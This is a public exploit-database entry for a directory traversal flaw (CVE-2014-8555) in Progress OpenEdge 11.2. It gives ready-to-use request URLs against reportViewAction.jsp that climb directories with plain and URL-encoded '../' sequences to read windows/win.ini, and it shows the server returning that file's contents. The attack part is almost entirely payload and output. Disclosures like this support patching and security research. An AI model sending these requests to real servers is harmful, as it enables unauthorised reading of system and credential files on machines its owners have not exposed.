Progress OpenEdge 11.2 - Directory Traversal

Author: XLabs Security
type: webapps
platform: jsp
port: 9090.0
date_added: 2014-11-07  
date_updated: 2014-11-07  
verified: 0  
codes: CVE-2014-8555;OSVDB-114556  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 35127.txt  

# Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555



The malicious user sends a malformed request that generates the file access
up directories as follows:



http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini



or else



http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini





And the application answers



; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

CMCDLLNAME32=mapi32.dll

CMC=1

MAPIX=1

MAPIXVER=1.0.0.1

OLEMessaging=1





More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256



Thanks